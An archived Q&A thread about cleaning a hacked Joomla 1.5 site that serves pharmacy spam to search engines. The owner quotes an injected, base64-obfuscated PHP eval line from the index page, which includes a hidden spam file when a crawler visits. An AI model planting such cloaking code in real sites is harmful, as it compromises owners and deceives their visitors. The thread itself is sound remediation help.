Go Premium for a chance to win a PS4. Enter to Win

x
?
Solved

I have a site that has got viagra and other spam stuff all through their site on google.

Posted on 2014-09-03
7
Medium Priority
?
319 Views
Last Modified: 2014-09-18
Hi,
On my site here http://simmental.com.au you will notice that if you google search it, there are spam words through out the site.
How do I clean this site up and get rid of the garbage?
Thank you
0
Comment
Question by:Amanda Watson
  • 3
  • 3
7 Comments
 
LVL 58

Assisted Solution

by:Gary
Gary earned 400 total points
ID: 40302498
Is this a CMS?
Can you give some example pages where the spam is?

Obviously someone has hacked the site and you need to check all your files for funny things like base64 encoded code
Change all your passwords - ftp etc - immediately
0
 
LVL 11

Author Comment

by:Amanda Watson
ID: 40309123
Thanks,  changing passwords etc is obvious now!, but how can I fix whats is there.....do all files have to be tested?
0
 
LVL 58

Expert Comment

by:Gary
ID: 40309125
Yes, unless you have a backup you can upload.
0
Reclaim your office - Try the MB 660 headset now!

High level of background noise often makes it difficult for employees to concentrate fully on their jobs – or to communicate clearly on calls. The MB 660 headset helps you create a disruption free workspace.  

 
LVL 11

Author Comment

by:Amanda Watson
ID: 40315987
I found this on the index page
<?php @eval(base64_decode("aWYgKEBwcmVnX21hdGNoICgiL1tHZ11bT29dW09vXVtHZ11bTGxdW0VlXXxbTGxdW0lpXVtWdl1bRWVdfFtNbV1bU3NdW05uXXxbWXldW0FhXVtIaF1bT29dW09vXXxbQWFdW1NzXVtLa118W0FhXVtPb11bTGxdfFtCYl1bT29dW1R0XS8iLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpIHsKCWlmIChAaXNfZmlsZSgiLi9pbWFnZXMvc3Rvcmllcy9saXN0LnR4dCIpKSB7CgkJQGluY2x1ZGUgIi4vaW1hZ2VzL3N0b3JpZXMvbGlzdC50eHQiOwoJfQp9Cg==")); ?>


Could that be the only area or cultprit?
A
0
 
LVL 58

Expert Comment

by:Gary
ID: 40315992
Usually its one or 2 files, if you remove it is it fixed
0
 
LVL 18

Accepted Solution

by:
Lucas Bishop earned 1600 total points
ID: 40318680
In viewing the source code of your site, I see you're using Joomla 1.5 as your CMS.  The version you are using reached end of life in Sep 2012. See the announcement here: http://docs.joomla.org/Joomla_1.5_version_history

You can remove any malicious scripts you find in the source code of your site, but odds are, there are a variety of security holes in your CMS. Hence, if you remove the malicious files today, they'll probably be inserted again shortly thereafter.  You can search google for "joomla 1.5 exploit" and find a slew of potential culprits that can effect your current setup.

Finally, I decoded the script you posted above and the following file is being referenced in it, from your server... I'd delete this: http://simmental.com.au/images/stories/list.txt
0
 
LVL 11

Author Closing Comment

by:Amanda Watson
ID: 40331789
Well advised
0

Featured Post

Concerto Cloud for Software Providers & ISVs

Can Concerto Cloud Services help you focus on evolving your application offerings, while delivering the best cloud experience to your customers? From DevOps to revenue models and customer support, the answer is yes!

Learn how Concerto can help you.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

The burden of debt that average person carries today has not only increased, but it keeps on growing. It is quite common nowadays that people find it extremely difficult to make ends meet in the face of millions of competing priorities that they hav…
Ranking ecommerce websites is a vital process. You need to have a strong SEO (Search Engine Optimization) strategy. If you don’t have one, you are losing out on brand impressions, clicks and sales. Check this guide on how to improve website traffic …
The viewer will learn how to dynamically set the form action using jQuery.
This tutorial will teach you the core code needed to finalize the addition of a watermark to your image. The viewer will use a small PHP class to learn and create a watermark.
Suggested Courses

927 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question